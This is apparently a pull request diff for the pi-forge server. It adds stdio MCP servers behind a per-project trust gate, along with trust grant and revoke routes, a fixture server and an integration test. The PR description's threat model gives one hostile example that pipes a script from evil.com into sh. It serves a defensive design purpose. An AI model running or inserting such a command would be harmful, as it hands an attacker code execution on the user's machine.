+    if (typeof projects !== "object" || projects === null) return { projects: {} };
+    const out: TrustState = { projects: {} };
+    for (const [pid, val] of Object.entries(projects as Record<string, unknown>)) {
+      if (typeof val !== "object" || val === null) continue;
+      const trustedAt = (val as { trustedAt?: unknown }).trustedAt;
+      if (typeof trustedAt !== "string") continue;
+      out.projects[pid] = { trustedAt };
+    }
+    return out;
+  } catch (err) {
+    if ((err as NodeJS.ErrnoException).code === "ENOENT") return { projects: {} };
+    throw err;
+  }
+}
+
+export async function isStdioTrustedForProject(projectId: string): Promise<boolean> {
+  const cur = await readAll();
+  return cur.projects[projectId] !== undefined;
+}
+
+export async function grantStdioTrust(projectId: string): Promise<void> {
+  const cur = await readAll();
+  if (cur.projects[projectId] !== undefined) return;
+  cur.projects[projectId] = { trustedAt: new Date().toISOString() };
+  await atomicWrite(cur);
+}
+
+export async function revokeStdioTrust(projectId: string): Promise<void> {
+  const cur = await readAll();
+  if (cur.projects[projectId] === undefined) return;
+  delete cur.projects[projectId];
+  await atomicWrite(cur);
+}
+
+/**
+ * Drop the trust record on project delete so the file doesn't
+ * accumulate orphans. Mirrors the skill/tool/prompt-overrides
+ * cleanup hook called from project-manager.deleteProject.
+ */
+export async function clearProjectStdioTrust(projectId: string): Promise<void> {
+  await revokeStdioTrust(projectId);
+}
+
+/** Exported for tests so the empty-state branch is reachable. */
+export const _EMPTY_FOR_TESTS = EMPTY;

--- a/packages/server/src/project-manager.ts
+++ b/packages/server/src/project-manager.ts
@@ -15,6 +15,7 @@ import { config } from "./config.js";
 import { clearProjectOverrides as clearProjectSkillOverrides } from "./skill-overrides.js";
 import { clearProjectPromptOverrides } from "./prompt-overrides.js";
 import { clearProjectSystemPromptAddendum } from "./system-prompt-overrides.js";
+import { clearProjectStdioTrust } from "./mcp/stdio-trust.js";
 
 /**
  * Project ids are always `randomUUID()` output. Mirrors the same
@@ -266,6 +267,9 @@ export async function deleteProject(
   });
   await clearProjectSystemPromptAddendum(id).catch((err: unknown) => {
     warn({ err, id }, "system-prompt-overrides cleanup failed");
+  });
+  await clearProjectStdioTrust(id).catch((err: unknown) => {
+    warn({ err, id }, "mcp-stdio-trust cleanup failed");
   });
   if (opts.cascadeSessionDir === true) {
     // Wipe the project's session directory. Best-effort — a missing

--- a/packages/server/src/routes/mcp.ts
+++ b/packages/server/src/routes/mcp.ts
@@ -1,4 +1,4 @@
-import type { FastifyPluginAsync } from "fastify";
+import type { FastifyPluginAsync, FastifyReply } from "fastify";
 import {
   deleteMcpServer,
   readMcpJsonRedacted,
@@ -13,51 +13,118 @@ import {
   getStatus,
   isGloballyEnabled,
   probe,
+  reconnectGatedStdioForProject,
   reloadGlobal,
+  unloadProject,
 } from "../mcp/manager.js";
+import { grantStdioTrust, isStdioTrustedForProject, revokeStdioTrust } from "../mcp/stdio-trust.js";
 import { getProject } from "../project-manager.js";
 import { errorSchema } from "./_schemas.js";
 
 interface McpServerBody {
-  url: string;
-  transport?: McpTransport;
   enabled?: boolean;
+  // remote
+  url?: string;
+  transport?: McpTransport;
   headers?: Record<string, string>;
+  // stdio
+  command?: string;
+  args?: string[];
+  env?: Record<string, string>;
+  cwd?: string;
 }
 
 const serverConfigSchema = {
+  // Required-fields validation is presence-based (one of url / command),
+  // enforced in `buildServerConfigFromBody` below. JSON Schema's
+  // `oneOf` works but the ajv error messages it emits are useless for
+  // the user; the explicit handler check stays the source of truth.
   type: "object",
-  required: ["url"],
   additionalProperties: false,
   properties: {
+    enabled: { type: "boolean" },
     url: { type: "string", minLength: 1 },
     transport: { type: "string", enum: ["auto", "streamable-http", "sse"] },
-    enabled: { type: "boolean" },
     headers: {
       type: "object",
       additionalProperties: { type: "string" },
     },
+    command: { type: "string", minLength: 1 },
+    args: { type: "array", items: { type: "string" } },
+    env: {
+      type: "object",
+      additionalProperties: { type: "string" },
+    },
+    cwd: { type: "string", minLength: 1 },
   },
 } as const;
 
 const statusEntrySchema = {
   type: "object",
-  required: ["scope", "name", "url", "enabled", "state", "toolCount"],
+  required: ["scope", "name", "kind", "enabled", "state", "toolCount"],
   properties: {
     scope: { type: "string", enum: ["global", "project"] },
     projectId: { type: "string" },
     name: { type: "string" },
+    kind: { type: "string", enum: ["remote", "stdio"] },
     url: { type: "string" },
+    command: { type: "string" },
+    args: { type: "array", items: { type: "string" } },
     enabled: { type: "boolean" },
     state: {
       type: "string",
-      enum: ["idle", "connecting", "connected", "error", "disabled"],
+      enum: ["idle", "connecting", "connected", "error", "disabled", "trust_required"],
     },
     toolCount: { type: "integer", minimum: 0 },
     lastError: { type: "string" },
     transport: { type: "string", enum: ["auto", "streamable-http", "sse"] },
   },
 } as const;
+
+/**
+ * Validate the presence-based one-of constraint and copy the body
+ * into a fresh `McpServerConfig`. Either branch ↦ returns the
+ * config; ambiguous / empty input ↦ writes the 400 to `reply` and
+ * returns undefined (caller short-circuits with the same reply).
+ */
+function buildServerConfigFromBody(
+  body: McpServerBody,
+  reply: FastifyReply,
+): McpServerConfig | undefined {
+  const hasUrl = typeof body.url === "string" && body.url.length > 0;
+  const hasCommand = typeof body.command === "string" && body.command.length > 0;
+  if (hasUrl && hasCommand) {
+    reply.code(400).send({
+      error: "mcp_invalid_config",
+      message: "an MCP server must declare either `url` (remote) or `command` (stdio), not both",
+    });
+    return undefined;
+  }
+  if (!hasUrl && !hasCommand) {
+    reply.code(400).send({
+      error: "mcp_invalid_config",
+      message: "an MCP server must declare either `url` (remote) or `command` (stdio)",
+    });
+    return undefined;
+  }
+  const cfg: McpServerConfig = {};
+  if (body.enabled !== undefined) cfg.enabled = body.enabled;
+  // Re-derive the narrowed strings instead of using `body.url!` —
+  // exactOptionalPropertyTypes refuses to widen the assignment
+  // target to `string | undefined` even when `hasUrl` proved
+  // non-undefined a few lines up.
+  if (hasUrl && body.url !== undefined) {
+    cfg.url = body.url;
+    if (body.transport !== undefined) cfg.transport = body.transport;
+    if (body.headers !== undefined) cfg.headers = body.headers;
+  } else if (body.command !== undefined) {
+    cfg.command = body.command;
+    if (body.args !== undefined) cfg.args = [...body.args];
+    if (body.env !== undefined) cfg.env = body.env;
+    if (body.cwd !== undefined) cfg.cwd = body.cwd;
+  }
+  return cfg;
+}
 
 export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
   // ---- master enable/disable + connection summary ----
@@ -141,10 +208,14 @@ export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
       schema: {
         description:
           "List the GLOBAL MCP server registry (pi-forge-owned at " +
-          "${FORGE_DATA_DIR}/mcp.json). Header values are redacted with " +
-          "the same '***REDACTED***' sentinel pattern as models.json. Pass " +
-          "?projectId=<id> to also include the project-scoped registry " +
-          "(read from <projectPath>/.mcp.json).",
+          "${FORGE_DATA_DIR}/mcp.json). Header / env values are redacted " +
+          "with the same '***REDACTED***' sentinel pattern as models.json. " +
+          "Pass ?projectId=<id> to also include the project-scoped " +
+          "registry (read from <projectPath>/.mcp.json). When " +
+          "?projectId is set, `stdioTrust` reports whether the operator " +
+          "has granted the project permission to declare stdio MCP " +
+          "servers (project-scoped stdio entries that haven't been " +
+          "trusted appear in status with state='trust_required').",
         tags: ["config"],
         querystring: {
           type: "object",
@@ -157,6 +228,11 @@ export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
             properties: {
               servers: { type: "object", additionalProperties: serverConfigSchema },
               status: { type: "array", items: statusEntrySchema },
+              stdioTrust: {
+                type: "object",
+                required: ["trusted"],
+                properties: { trusted: { type: "boolean" } },
+              },
             },
           },
           500: errorSchema,
@@ -168,17 +244,25 @@ export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
       // If a project was passed, eagerly load its .mcp.json so the
       // status array reflects current state. The global file is
       // already loaded at server boot.
+      let stdioTrust: { trusted: boolean } | undefined;
       if (projectId !== undefined) {
         const project = await getProject(projectId);
         if (project !== undefined) {
           await ensureProjectLoaded(project.id, project.path);
+          stdioTrust = { trusted: await isStdioTrustedForProject(project.id) };
         }
       }
       const cfg = await readMcpJsonRedacted();
-      return {
+      const result: {
+        servers: Record<string, McpServerConfig>;
+        status: ReturnType<typeof getStatus>;
+        stdioTrust?: { trusted: boolean };
+      } = {
         servers: cfg.servers,
         status: getStatus(projectId !== undefined ? { projectId } : undefined),
       };
+      if (stdioTrust !== undefined) result.stdioTrust = stdioTrust;
+      return result;
     },
   );
 
@@ -211,12 +295,10 @@ export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
         },
       },
     },
-    async (req) => {
+    async (req, reply) => {
       const { name } = req.params;
-      const cfg: McpServerConfig = { url: req.body.url };
-      if (req.body.transport !== undefined) cfg.transport = req.body.transport;
-      if (req.body.enabled !== undefined) cfg.enabled = req.body.enabled;
-      if (req.body.headers !== undefined) cfg.headers = req.body.headers;
+      const cfg = buildServerConfigFromBody(req.body, reply);
+      if (cfg === undefined) return reply;
       await upsertMcpServer(name, cfg);
       await reloadGlobal();
       return { ok: true };
@@ -356,6 +438,93 @@ export const mcpRoutes: FastifyPluginAsync = async (fastify) => {
         description: t.description,
       }));
       return { tools };
+    },
+  );
+
+  // ---- stdio trust: grant + revoke per-project ----
+  fastify.post<{ Params: { projectId: string } }>(
+    "/mcp/trust/:projectId",
+    {
+      schema: {
+        description:
+          "Grant this project permission to declare stdio (subprocess- " +
+          "spawning) MCP servers in its `.mcp.json`. Required before " +
+          "pi-forge will spawn any stdio entry from a project's config " +
+          "file — otherwise the entries appear in status with " +
+          "state='trust_required' and produce no tools. Granting trust " +
+          "immediately retries connection for every gated stdio entry " +
+          "in the project; remote entries are unaffected. Globally- " +
+          "configured stdio entries (in ${FORGE_DATA_DIR}/mcp.json) are " +
+          "never gated — they're the operator's own config.",
+        tags: ["config"],
+        params: {
+          type: "object",
+          required: ["projectId"],
+          properties: { projectId: { type: "string" } },
+        },
+        response: {
+          200: {
+            type: "object",
+            required: ["trusted", "status"],
+            properties: {
+              trusted: { type: "boolean" },
+              status: { type: "array", items: statusEntrySchema },
+            },
+          },
+          404: errorSchema,
+        },
+      },
+    },
+    async (req, reply) => {
+      const project = await getProject(req.params.projectId);
+      if (project === undefined) {
+        return reply.code(404).send({ error: "project_not_found" });
+      }
+      await grantStdioTrust(project.id);
+      await ensureProjectLoaded(project.id, project.path);
+      await reconnectGatedStdioForProject(project.id);
+      return {
+        trusted: true,
+        status: getStatus({ projectId: project.id }),
+      };
+    },
+  );
+
+  fastify.delete<{ Params: { projectId: string } }>(
+    "/mcp/trust/:projectId",
+    {
+      schema: {
+        description:
+          "Revoke this project's stdio MCP trust. Disconnects every " +
+          "running project-scoped MCP server (including remote ones — " +
+          "the whole project pool is reset so the next ensureProjectLoaded " +
+          "re-applies the trust gate to stdio entries). The trust grant " +
+          "is also cleared automatically when the project itself is " +
+          "deleted (project-manager.deleteProject cascade).",
+        tags: ["config"],
+        params: {
+          type: "object",
+          required: ["projectId"],
+          properties: { projectId: { type: "string" } },
+        },
+        response: {
+          200: {
+            type: "object",
+            required: ["trusted"],
+            properties: { trusted: { type: "boolean" } },
+          },
+          404: errorSchema,
+        },
+      },
+    },
+    async (req, reply) => {
+      const project = await getProject(req.params.projectId);
+      if (project === undefined) {
+        return reply.code(404).send({ error: "project_not_found" });
+      }
+      await revokeStdioTrust(project.id);
+      await unloadProject(project.id);
+      return { trusted: false };
     },
   );
 };

--- a/tests/fixtures/mcp-stdio-fixture.mjs
+++ b/tests/fixtures/mcp-stdio-fixture.mjs
@@ -1,0 +1,69 @@
+#!/usr/bin/env node
+/**
+ * Minimal stdio MCP server fixture for test-mcp-stdio.
+ *
+ * Runs forever, speaks MCP over stdin/stdout via the SDK's
+ * StdioServerTransport. Registers two tools:
+ *   - `echo`: returns the input text verbatim
+ *   - `report-env`: returns the values of MCP_TEST_VAR_A and
+ *     MCP_TEST_VAR_B from the subprocess env, so the test can
+ *     verify env passthrough (and that secrets-redaction round-trip
+ *     preserved the value across an upsert).
+ *
+ * Optional `--crash-on-start` arg exits non-zero before the
+ * transport is wired so the test can exercise the manager's
+ * connect-failure path. Optional `--name <s>` lets the test spawn
+ * differently-named fixture servers for the project-overrides-
+ * global collision case.
+ */
+import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
+import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
+import { z } from "zod";
+
+const args = process.argv.slice(2);
+if (args.includes("--crash-on-start")) {
+  // Exit before transport setup so the parent's connect() throws.
+  process.stderr.write("[fixture] crash-on-start requested\n");
+  process.exit(2);
+}
+
+const nameIdx = args.indexOf("--name");
+const serverName = nameIdx >= 0 && args[nameIdx + 1] !== undefined ? args[nameIdx + 1] : "fixture";
+
+const mcp = new McpServer({ name: serverName, version: "0.0.1" });
+
+mcp.registerTool(
+  "echo",
+  {
+    description: "Echo the input text back.",
+    inputSchema: { text: z.string() },
+  },
+  ({ text }) => ({
+    content: [{ type: "text", text }],
+  }),
+);
+
+mcp.registerTool(
+  "report-env",
+  {
+    description: "Report MCP_TEST_VAR_A + MCP_TEST_VAR_B from the subprocess env.",
+    inputSchema: {},
+  },
+  () => ({
+    content: [
+      {
+        type: "text",
+        text: JSON.stringify({
+          a: process.env.MCP_TEST_VAR_A ?? null,
+          b: process.env.MCP_TEST_VAR_B ?? null,
+          cwd: process.cwd(),
+        }),
+      },
+    ],
+  }),
+);
+
+const transport = new StdioServerTransport();
+await mcp.connect(transport);
+// Keep the process alive until the parent closes stdin. The SDK
+// handles the JSON-RPC framing; we just have to not exit.

--- a/tests/test-mcp-stdio.ts
+++ b/tests/test-mcp-stdio.ts
@@ -1,0 +1,400 @@
+/**
+ * STDIO MCP integration test.
+ *
+ * Drives the MCP manager + routes against the local stdio fixture
+ * at `tests/fixtures/mcp-stdio-fixture.mjs`. Coverage:
+ *
+ *   - global stdio entry: load → spawn → list tools → execute
+ *   - env redaction: GET returns sentinel; PUT round-trips real value
+ *   - project stdio entry: gated by trust → `trust_required` state
+ *   - POST /mcp/trust grants → reconnects → tools appear
+ *   - DELETE /mcp/trust revokes → project unloaded; re-load re-gates
+ *   - presence-based one-of: both url + command → 400; neither → 400
+ *   - crash-on-spawn → state `error` with lastError set
+ *   - project delete cascade clears the trust file
+ */
+import { mkdir, mkdtemp, readFile, rm, writeFile } from "node:fs/promises";
+import { tmpdir } from "node:os";
+import { dirname, join, resolve } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+const repoRoot = resolve(__dirname, "..");
+const fixtureScript = resolve(__dirname, "fixtures", "mcp-stdio-fixture.mjs");
+
+let failures = 0;
+function assert(label: string, ok: boolean, detail?: string): void {
+  if (ok) console.log(`  PASS  ${label}`);
+  else {
+    failures += 1;
+    console.log(`  FAIL  ${label}${detail ? ` — ${detail}` : ""}`);
+  }
+}
+
+interface JsonResponse {
+  status: number;
+  body: unknown;
+}
+
+async function jget(base: string, path: string): Promise<JsonResponse> {
+  const res = await fetch(`${base}${path}`);
+  const text = await res.text();
+  return { status: res.status, body: text === "" ? undefined : JSON.parse(text) };
+}
+
+async function jsend(
+  base: string,
+  method: "POST" | "PUT" | "PATCH" | "DELETE",
+  path: string,
+  body?: unknown,
+): Promise<JsonResponse> {
+  const init: RequestInit = { method };
+  if (body !== undefined) {
+    init.headers = { "Content-Type": "application/json" };
+    init.body = JSON.stringify(body);
+  }
+  const res = await fetch(`${base}${path}`, init);
+  const text = await res.text();
+  return { status: res.status, body: text === "" ? undefined : JSON.parse(text) };
+}
+
+async function main(): Promise<void> {
+  const dataDir = await mkdtemp(join(tmpdir(), "pi-mcp-stdio-data-"));
+  const workspacePath = await mkdtemp(join(tmpdir(), "pi-mcp-stdio-ws-"));
+  const configDir = await mkdtemp(join(tmpdir(), "pi-mcp-stdio-cfg-"));
+  process.env.FORGE_DATA_DIR = dataDir;
+  process.env.WORKSPACE_PATH = workspacePath;
+  process.env.PI_CONFIG_DIR = configDir;
+  process.env.SESSION_DIR = join(workspacePath, ".pi", "sessions");
+  process.env.NODE_ENV = "test";
+  delete process.env.UI_PASSWORD;
+  delete process.env.JWT_SECRET;
+  delete process.env.API_KEY;
+
+  console.log(`[test-mcp-stdio] FORGE_DATA_DIR=${dataDir}`);
+  console.log(`[test-mcp-stdio] WORKSPACE_PATH=${workspacePath}`);
+
+  const serverModule = (await import(
+    resolve(repoRoot, "packages/server/dist/index.js")
+  )) as typeof import("../packages/server/src/index.js");
+  const managerModule = (await import(
+    resolve(repoRoot, "packages/server/dist/mcp/manager.js")
+  )) as typeof import("../packages/server/src/mcp/manager.js");
+  const configModule = (await import(
+    resolve(repoRoot, "packages/server/dist/mcp/config.js")
+  )) as typeof import("../packages/server/src/mcp/config.js");
+
+  // Wait for an entry to leave `connecting` (the manager fires
+  // connect attempts fire-and-forget from syncScope, so loadGlobal /
+  // upsert routes return before the subprocess handshake finishes).
+  type ConnectionState =
+    | "idle"
+    | "connecting"
+    | "connected"
+    | "error"
+    | "disabled"
+    | "trust_required";
+  type ServerStatus = ReturnType<typeof managerModule.getStatus>[number];
+  const waitForState = async (
+    name: string,
+    target: ConnectionState,
+    opts: { projectId?: string; budgetMs?: number } = {},
+  ): Promise<ServerStatus | undefined> => {
+    const deadline = Date.now() + (opts.budgetMs ?? 5000);
+    const wantScope = opts.projectId !== undefined ? "project" : "global";
+    const statusOpts = opts.projectId !== undefined ? { projectId: opts.projectId } : undefined;
+    while (Date.now() < deadline) {
+      const status = managerModule.getStatus(statusOpts);
+      const entry = status.find((s) => s.name === name && s.scope === wantScope);
+      if (entry?.state === target) return entry;
+      await new Promise((r) => setTimeout(r, 50));
+    }
+    return undefined;
+  };
+
+  const fastify = await serverModule.buildServer();
+  const base = await fastify.listen({ port: 0, host: "127.0.0.1" });
+
+  try {
+    /* ===== Case A: global stdio entry → spawn → list → execute ===== */
+    await configModule.writeMcpJson({
+      servers: {
+        local: {
+          command: "node",
+          args: [fixtureScript],
+          env: { MCP_TEST_VAR_A: "value-A", MCP_TEST_VAR_B: "value-B" },
+        },
+      },
+    });
+    await managerModule.loadGlobal();
+    const connected = await waitForState("local", "connected");
+    assert(
+      "global stdio: state === connected",
+      connected?.state === "connected",
+      JSON.stringify(connected),
+    );
+    assert("global stdio: kind === stdio", connected?.kind === "stdio");
+    assert("global stdio: command surfaced", connected?.command === "node");
+    assert(
+      "global stdio: 2 tools (echo + report-env)",
+      connected?.toolCount === 2,
+      `toolCount=${String(connected?.toolCount)}`,
+    );
+
+    /* ===== Case B: bridged execute reaches the subprocess ===== */
+    const tools = managerModule.customToolsForProject("any-project-id");
+    const echo = tools.find((t) => t.name === "local__echo");
+    assert("bridged echo tool present", echo !== undefined);
+    if (echo !== undefined) {
+      const result = await echo.execute(
+        "tcid-1",
+        { text: "round-trip" },
+        undefined,
+        undefined,
+        {} as Parameters<typeof echo.execute>[4],
+      );
+      const out = JSON.stringify(result);
+      assert("execute returned echoed text", out.includes("round-trip"), out);
+    }
+
+    /* ===== Case C: env actually reaches the subprocess ===== */
+    const reportEnv = tools.find((t) => t.name === "local__report-env");
+    if (reportEnv !== undefined) {
+      const r = await reportEnv.execute(
+        "tcid-env",
+        {},
+        undefined,
+        undefined,
+        {} as Parameters<typeof reportEnv.execute>[4],
+      );
+      const out = JSON.stringify(r);
+      assert("subprocess env: MCP_TEST_VAR_A passed through", out.includes("value-A"), out);
+      assert("subprocess env: MCP_TEST_VAR_B passed through", out.includes("value-B"), out);
+    }
+
+    /* ===== Case D: env values are redacted on the GET path ===== */
+    {
+      const r = await jget(base, "/api/v1/mcp/servers");
+      assert("GET /mcp/servers → 200", r.status === 200);
+      const body = r.body as {
+        servers: Record<string, { env?: Record<string, string> }>;
+      };
+      const envOnWire = body.servers.local?.env ?? {};
+      assert(
+        "env values redacted on the wire",
+        envOnWire.MCP_TEST_VAR_A === "***REDACTED***" &&
+          envOnWire.MCP_TEST_VAR_B === "***REDACTED***",
+        JSON.stringify(envOnWire),
+      );
+    }
+
+    /* ===== Case E: sentinel round-trip on save preserves prior value ===== */
+    {
+      // The UI sees `***REDACTED***`. Save without changing it.
+      const r = await jsend(base, "PUT", "/api/v1/mcp/servers/local", {
+        command: "node",
+        args: [fixtureScript],
+        env: { MCP_TEST_VAR_A: "***REDACTED***", MCP_TEST_VAR_B: "value-B-edited" },
+        enabled: true,
+      });
+      assert("PUT /mcp/servers/local → 200", r.status === 200);
+      // Re-read the on-disk file directly.
+      const raw = await readFile(join(dataDir, "mcp.json"), "utf8");
+      const parsed = JSON.parse(raw) as {
+        servers: Record<string, { env?: Record<string, string> }>;
+      };
+      const persisted = parsed.servers.local?.env ?? {};
+      assert(
+        "sentinel preserved prior MCP_TEST_VAR_A value",
+        persisted.MCP_TEST_VAR_A === "value-A",
+        JSON.stringify(persisted),
+      );
+      assert(
+        "non-sentinel overwrote MCP_TEST_VAR_B",
+        persisted.MCP_TEST_VAR_B === "value-B-edited",
+        JSON.stringify(persisted),
+      );
+    }
+
+    /* ===== Case F: one-of url/command validation ===== */
+    {
+      const both = await jsend(base, "PUT", "/api/v1/mcp/servers/bad-both", {
+        url: "https://example.com",
+        command: "node",
+      });
+      assert("PUT with both url + command → 400", both.status === 400, JSON.stringify(both.body));
+      const neither = await jsend(base, "PUT", "/api/v1/mcp/servers/bad-neither", {
+        enabled: true,
+      });
+      assert(
+        "PUT with neither url nor command → 400",
+        neither.status === 400,
+        JSON.stringify(neither.body),
+      );
+    }
+
+    /* ===== Case G: crash-on-start surfaces in `error` state ===== */
+    {
+      await jsend(base, "PUT", "/api/v1/mcp/servers/crasher", {
+        command: "node",
+        args: [fixtureScript, "--crash-on-start"],
+      });
+      const status = await waitForState("crasher", "error", { budgetMs: 5000 });
+      assert("crashed stdio: state === error", status?.state === "error", JSON.stringify(status));
+      assert(
+        "crashed stdio: lastError populated",
+        typeof status?.lastError === "string" && status.lastError.length > 0,
+        JSON.stringify(status?.lastError),
+      );
+    }
+
+    /* ===== Case H: project stdio entry is gated by trust ===== */
+    // Create a project + drop a project .mcp.json with a stdio entry.
+    const projRes = await jsend(base, "POST", "/api/v1/projects", {
+      name: "stdio-trust-test",
+      path: workspacePath,
+    });
+    assert("create project → 201", projRes.status === 201);
+    const projectId = (projRes.body as { id: string }).id;
+
+    await writeFile(
+      join(workspacePath, ".mcp.json"),
+      JSON.stringify({
+        servers: {
+          "proj-fixture": {
+            command: "node",
+            args: [fixtureScript, "--name", "proj-fixture"],
+          },
+        },
+      }),
+      "utf8",
+    );
+
+    // GET should report stdioTrust: false and the entry as trust_required.
+    {
+      const r = await jget(base, `/api/v1/mcp/servers?projectId=${projectId}`);
+      const body = r.body as {
+        stdioTrust?: { trusted: boolean };
+        status: { name: string; scope: string; state: string }[];
+      };
+      assert("GET reports stdioTrust.trusted === false", body.stdioTrust?.trusted === false);
+      const projStatus = body.status.find(
+        (s) => s.name === "proj-fixture" && s.scope === "project",
+      );
+      assert(
+        "project stdio entry: state === trust_required",
+        projStatus?.state === "trust_required",
+        JSON.stringify(projStatus),
+      );
+      // No tools should be visible until trust is granted.
+      const toolsForProj = managerModule.customToolsForProject(projectId);
+      const fromProject = toolsForProj.filter((t) => t.name.startsWith("proj-fixture__"));
+      assert(
+        "no project tools surface before trust",
+        fromProject.length === 0,
+        `count=${fromProject.length}`,
+      );
+    }
+
+    /* ===== Case I: granting trust spawns the subprocess + surfaces tools ===== */
+    {
+      const grant = await jsend(base, "POST", `/api/v1/mcp/trust/${projectId}`);
+      assert("POST /mcp/trust → 200", grant.status === 200);
+      assert("grant body: trusted === true", (grant.body as { trusted: boolean }).trusted === true);
+      const status = await waitForState("proj-fixture", "connected", {
+        projectId,
+        budgetMs: 5000,
+      });
+      assert(
+        "project stdio: connected after trust",
+        status?.state === "connected",
+        JSON.stringify(status),
+      );
+      const toolsForProj = managerModule.customToolsForProject(projectId);
+      const fromProject = toolsForProj.filter((t) => t.name.startsWith("proj-fixture__"));
+      assert(
+        "project tools visible after trust",
+        fromProject.length === 2,
+        `count=${fromProject.length}`,
+      );
+    }
+
+    /* ===== Case J: revoke trust unloads the project pool ===== */
+    {
+      const revoke = await jsend(base, "DELETE", `/api/v1/mcp/trust/${projectId}`);
+      assert("DELETE /mcp/trust → 200", revoke.status === 200);
+      // After revoke, the project entries are dropped from the pool.
+      const status = managerModule.getStatus({ projectId });
+      const projEntries = status.filter((s) => s.scope === "project");
+      assert(
+        "project entries dropped from pool after revoke",
+        projEntries.length === 0,
+        JSON.stringify(projEntries),
+      );
+      // Re-loading the project re-applies the gate.
+      const r = await jget(base, `/api/v1/mcp/servers?projectId=${projectId}`);
+      const body = r.body as {
+        stdioTrust?: { trusted: boolean };
+        status: { name: string; scope: string; state: string }[];
+      };
+      assert(
+        "re-loaded after revoke: stdioTrust.trusted === false",
+        body.stdioTrust?.trusted === false,
+      );
+      const projStatus = body.status.find(
+        (s) => s.name === "proj-fixture" && s.scope === "project",
+      );
+      assert(
+        "re-loaded after revoke: state === trust_required",
+        projStatus?.state === "trust_required",
+        JSON.stringify(projStatus),
+      );
+    }
+
+    /* ===== Case K: project delete cascades the trust entry ===== */
+    {
+      // Re-grant so the trust file actually has an entry to clear.
+      await jsend(base, "POST", `/api/v1/mcp/trust/${projectId}`);
+      const trustPath = join(dataDir, "mcp-stdio-trust.json");
+      const beforeRaw = await readFile(trustPath, "utf8").catch(() => "{}");
+      const before = JSON.parse(beforeRaw) as { projects?: Record<string, unknown> };
+      assert(
+        "trust file has entry before project delete",
+        before.projects?.[projectId] !== undefined,
+        beforeRaw,
+      );
+      const del = await jsend(base, "DELETE", `/api/v1/projects/${projectId}`);
+      assert("DELETE project → 200", del.status === 200);
+      const afterRaw = await readFile(trustPath, "utf8").catch(() => "{}");
+      const after = JSON.parse(afterRaw) as { projects?: Record<string, unknown> };
+      assert(
+        "trust file entry cleared after project delete",
+        after.projects?.[projectId] === undefined,
+        afterRaw,
+      );
+    }
+  } finally {
+    await fastify.close();
+    await managerModule.disposeAll().catch(() => undefined);
+    await rm(dataDir, { recursive: true, force: true }).catch(() => undefined);
+    await rm(workspacePath, { recursive: true, force: true }).catch(() => undefined);
+    await rm(configDir, { recursive: true, force: true }).catch(() => undefined);
+  }
+
+  if (failures > 0) {
+    console.log(`\n[test-mcp-stdio] FAIL — ${failures} assertion(s) failed`);
+    process.exit(1);
+  }
+  console.log("\n[test-mcp-stdio] PASS");
+}
+
+// Silence the unused mkdir import warning — we use mkdir-like setup in
+// tmpdir() but no explicit mkdir call. Keep the import handy in case
+// future cases (multi-file project fixture) need it.
+void mkdir;
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});


### PR DESCRIPTION
## Summary

Adds **stdio (subprocess) MCP servers** alongside the existing remote (HTTP/SSE) transports. Most official MCP servers — `server-filesystem`, `server-everything`, `server-memory`, `server-github`, etc. — are stdio-only; this PR closes that gap.

### Schema

Server kind is discriminated by which field is set (not by an explicit `kind` field) — matches the Claude Desktop / pi-mcp-adapter convention so existing `.mcp.json` files work unchanged.

| Kind | Discriminator | Wire |
|---|---|---|
| Remote | `url` is set | StreamableHTTP / SSE |
| Stdio | `command` is set | pi-forge spawns the subprocess; speaks MCP over its stdin/stdout |

Validator: exactly one of `url` / `command` must be set per server; 400 otherwise.

New stdio fields: `command`, `args[]`, `env{}`, `cwd?`.

### Security: per-project trust gate

Project-scoped stdio entries (in `<projectPath>/.mcp.json`) are **gated behind a per-project trust decision** stored at `${FORGE_DATA_DIR}/mcp-stdio-trust.json`. Until the operator grants trust via Settings → MCP, the entry sits in `trust_required` state — pi-forge does NOT spawn, no tools surface.

Global stdio entries (operator wrote `mcp.json` themselves) and remote project entries bypass the gate.

**Threat model.** A hostile repo's `.mcp.json` with `{ "command": "curl", "args": ["evil.com/x.sh","|","sh"] }` shouldn't get free code execution on `git clone` + open. Remote entries have a smaller blast radius (need a network endpoint to do anything); stdio is local code execution with whatever env we pass through — treat it like running a binary out of the repo.

Trust persists per-project, indefinite. Adding new stdio entries to an already-trusted project does NOT re-prompt — the decision is "this project's `.mcp.json` is allowed to declare stdio servers"; the file's contents are part of the codebase the operator already trusts. If per-entry confirmation is wanted, revoke first.

### Env passthrough

The MCP SDK's `StdioClientTransport` does NOT inherit the pi-forge process env by default — it uses `getDefaultEnvironment()` (PATH, HOME, locale vars, terminal vars). Pi-forge preserves that safe-by-default behavior: the subprocess sees `getDefaultEnvironment() ∪ cfg.env`. An `OPENAI_API_KEY` set in the pi-forge shell will NOT silently leak to every stdio MCP subprocess — operators must list it explicitly via the `env` field.

Env values are secret-redacted on the GET path with the same `***REDACTED***` sentinel + round-trip-merge pattern as remote `headers` / `models.json#apiKey`.

## Files

**Server**
- `mcp/config.ts` — extended `McpServerConfig`; `isStdioConfig()` discriminator; shared env/headers redaction helper.
- `mcp/manager.ts` — `openStdio()` via `StdioClientTransport`; new `trust_required` state; trust gate in `connectEntry()`; project cwd cache; `reconnectGatedStdioForProject()` + `unloadProject()` for the grant/revoke flow; `ServerStatus` now carries `kind: "remote" | "stdio"` + `command` / `args`.
- `mcp/stdio-trust.ts` (new) — per-project trust store (mode 0600, atomic write, mirrors the existing override-files pattern).
- `config.ts` — `mcpStdioTrustFile` path entry.
- `project-manager.ts` — cascade-delete the trust entry on project deletion.
- `routes/mcp.ts` — schema for new fields, presence-based one-of validator (`buildServerConfigFromBody`), `POST` + `DELETE /mcp/trust/:projectId`, `stdioTrust` field on the projectId-scoped GET.

**Client**
- `api-client/types.ts` + `index.ts` — `McpServerConfig` mirrors server shape; `McpServerStatus` gains `kind` / `command` / `args`; `McpServersResponse.stdioTrust?`; `grantStdioMcpTrust` + `revokeStdioMcpTrust`.
